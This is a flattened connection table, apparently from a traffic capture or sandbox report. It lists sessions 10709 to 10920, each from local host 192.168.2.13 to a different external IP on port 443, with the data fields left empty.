                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10709192.168.2.135913477.49.242.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10710192.168.2.134056412.48.176.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10711192.168.2.136090619.131.237.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10712192.168.2.1338390121.135.87.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10713192.168.2.134487059.226.121.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10714192.168.2.1339526136.44.217.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10715192.168.2.133412691.151.29.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10716192.168.2.1333614164.174.34.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10717192.168.2.1334510171.63.222.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10718192.168.2.13366649.248.247.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10719192.168.2.1356748106.65.52.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10720192.168.2.1335410177.247.89.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10721192.168.2.133938042.39.140.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10722192.168.2.1355488104.231.44.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10723192.168.2.135996839.21.124.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10724192.168.2.134669451.46.159.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10725192.168.2.13491908.185.223.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10726192.168.2.133937625.229.246.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10727192.168.2.1345652128.39.101.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10728192.168.2.133633664.4.68.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10729192.168.2.1359662120.28.141.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10730192.168.2.134425458.39.66.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10731192.168.2.1356212118.56.86.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10732192.168.2.135596088.104.191.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10733192.168.2.135030844.137.130.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10734192.168.2.134845690.148.127.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10735192.168.2.135024076.18.219.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10736192.168.2.1337560110.33.146.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10737192.168.2.1359468218.70.242.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10738192.168.2.1343878134.23.157.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10739192.168.2.1354632102.66.208.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10740192.168.2.1359672194.176.140.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10741192.168.2.133573469.141.180.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10742192.168.2.135923267.41.116.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10743192.168.2.1340108154.234.99.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10744192.168.2.135016872.125.232.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10745192.168.2.135394077.153.0.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10746192.168.2.135396496.211.42.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10747192.168.2.1360160169.58.177.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10748192.168.2.134104888.146.58.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10749192.168.2.13490285.210.150.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10750192.168.2.1357782194.212.137.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10751192.168.2.1348666114.215.176.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10752192.168.2.134985425.184.35.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10753192.168.2.133824843.37.158.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10754192.168.2.13574488.249.65.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10755192.168.2.1353988223.157.74.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10756192.168.2.1345308112.205.109.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10757192.168.2.134213870.121.33.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10758192.168.2.133851481.202.255.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10759192.168.2.1344780206.115.192.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10760192.168.2.1355428154.138.202.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10761192.168.2.1347926148.13.195.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10762192.168.2.133917635.82.50.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10763192.168.2.133353654.123.221.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10764192.168.2.134294475.232.206.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10765192.168.2.134576491.234.164.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10766192.168.2.1341466223.49.118.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10767192.168.2.134893467.170.216.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10768192.168.2.1335420200.38.83.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10769192.168.2.13483325.72.38.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10770192.168.2.135790662.30.190.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10771192.168.2.1343854136.223.236.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10772192.168.2.1357166212.68.65.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10773192.168.2.1337274192.134.87.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10774192.168.2.134625870.39.169.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10775192.168.2.1342658143.16.138.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10776192.168.2.1341418203.5.210.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10777192.168.2.1339184128.150.196.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10778192.168.2.1360646223.211.176.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10779192.168.2.1350346102.22.5.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10780192.168.2.136038042.44.232.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10781192.168.2.135683688.79.60.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10782192.168.2.1355054135.213.191.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10783192.168.2.134476872.243.94.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10784192.168.2.134818094.187.163.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10785192.168.2.135508452.156.2.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10786192.168.2.134364074.232.97.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10787192.168.2.135687295.84.123.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10788192.168.2.133788697.196.242.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10789192.168.2.1334584170.245.234.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10790192.168.2.1344998222.103.47.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10791192.168.2.135378675.230.108.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10792192.168.2.1344516160.234.175.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10793192.168.2.1335192148.55.72.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10794192.168.2.1360966156.190.206.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10795192.168.2.1356946171.160.76.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10796192.168.2.1339618210.128.244.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10797192.168.2.134302445.155.244.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10798192.168.2.1354658148.43.158.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10799192.168.2.135287252.32.70.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10800192.168.2.134308841.235.255.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10801192.168.2.1338888126.3.152.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10802192.168.2.135450459.22.110.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10803192.168.2.1350344102.197.233.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10804192.168.2.135861695.52.213.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10805192.168.2.1347144161.65.68.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10806192.168.2.135302223.44.85.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10807192.168.2.133395485.186.181.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10808192.168.2.133674470.243.126.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10809192.168.2.135667691.132.182.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10810192.168.2.1353688160.99.78.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10811192.168.2.1358390162.42.22.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10812192.168.2.134209453.232.230.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10813192.168.2.133911295.205.163.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10814192.168.2.1340004145.160.168.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10815192.168.2.1345276167.191.135.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10816192.168.2.1334008206.136.66.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10817192.168.2.135073064.200.136.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10818192.168.2.133412272.78.174.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10819192.168.2.134264067.52.186.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10820192.168.2.135251097.211.45.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10821192.168.2.1350026143.164.215.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10822192.168.2.134145077.172.15.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10823192.168.2.1347624196.204.225.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10824192.168.2.135959892.70.198.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10825192.168.2.1341778165.158.132.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10826192.168.2.135803057.240.150.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10827192.168.2.135070853.143.109.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10828192.168.2.134387432.144.129.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10829192.168.2.135139643.234.0.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10830192.168.2.1356970192.218.233.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10831192.168.2.1358332216.142.232.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10832192.168.2.1358294165.163.167.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10833192.168.2.1341124196.129.221.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10834192.168.2.1337316130.37.68.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10835192.168.2.1337838152.250.41.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10836192.168.2.134546444.246.117.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10837192.168.2.1333850188.69.121.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10838192.168.2.1357016188.254.188.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10839192.168.2.1336508199.207.45.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10840192.168.2.1333872162.13.12.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10841192.168.2.1355156104.188.199.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10842192.168.2.135853092.153.182.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10843192.168.2.1347562194.67.131.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10844192.168.2.1351528136.199.183.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10845192.168.2.135466499.69.216.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10846192.168.2.135309250.102.4.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10847192.168.2.1347564223.148.255.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10848192.168.2.134130438.42.231.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10849192.168.2.1350986167.217.101.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10850192.168.2.1358850139.41.25.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10851192.168.2.1359816111.1.219.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10852192.168.2.133630487.11.52.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10853192.168.2.1338130111.41.108.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10854192.168.2.135237079.208.73.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10855192.168.2.1356352182.129.252.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10856192.168.2.133567662.194.195.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10857192.168.2.1341410209.8.37.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10858192.168.2.133634431.236.123.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10859192.168.2.1341584185.30.198.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10860192.168.2.1356210163.117.196.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10861192.168.2.134004489.54.169.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10862192.168.2.1360008213.9.152.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10863192.168.2.1355226138.138.47.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10864192.168.2.1346616173.233.0.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10865192.168.2.1340456223.168.202.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10866192.168.2.133772677.194.72.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10867192.168.2.1337684169.220.12.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10868192.168.2.1356516188.39.26.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10869192.168.2.1350324138.0.43.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10870192.168.2.134634496.19.248.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10871192.168.2.134742683.253.160.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10872192.168.2.134816087.244.198.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10873192.168.2.1341756156.229.252.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10874192.168.2.135935024.203.39.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10875192.168.2.1359060133.116.96.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10876192.168.2.1359666113.146.213.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10877192.168.2.135811297.124.33.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10878192.168.2.135541673.39.120.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10879192.168.2.1334772188.150.145.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10880192.168.2.1347270201.194.247.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10881192.168.2.1352340148.57.76.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10882192.168.2.1350070139.225.4.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10883192.168.2.134888691.149.146.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10884192.168.2.1352332109.81.3.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10885192.168.2.1359048136.110.79.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10886192.168.2.1338324205.247.14.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10887192.168.2.133934684.108.153.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10888192.168.2.1337504156.102.130.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10889192.168.2.135687888.207.29.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10890192.168.2.135308672.99.194.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10891192.168.2.134741617.248.143.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10892192.168.2.133697413.250.208.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10893192.168.2.1348712172.212.208.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10894192.168.2.1336968130.254.254.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10895192.168.2.1336942132.63.149.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10896192.168.2.1336962101.16.81.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10897192.168.2.1336936151.86.53.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10898192.168.2.134641414.3.120.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10899192.168.2.134934812.211.40.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10900192.168.2.135089664.117.157.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10901192.168.2.134379813.219.137.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10902192.168.2.1354956107.206.182.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10903192.168.2.134075652.127.88.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10904192.168.2.1354852163.124.190.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10905192.168.2.135934849.162.211.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10906192.168.2.133545243.72.156.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10907192.168.2.1354480155.94.80.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10908192.168.2.1358694211.51.122.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10909192.168.2.1346730218.71.5.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10910192.168.2.1349802105.213.41.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10911192.168.2.1332846210.60.43.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10912192.168.2.135387461.252.217.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10913192.168.2.1350652163.126.12.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10914192.168.2.1336658134.116.146.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10915192.168.2.134887018.88.101.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10916192.168.2.1335092135.245.200.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10917192.168.2.1358974140.46.109.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10918192.168.2.1334920138.85.233.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10919192.168.2.134712078.223.239.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10920192.168.2.1333188173.35.148.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
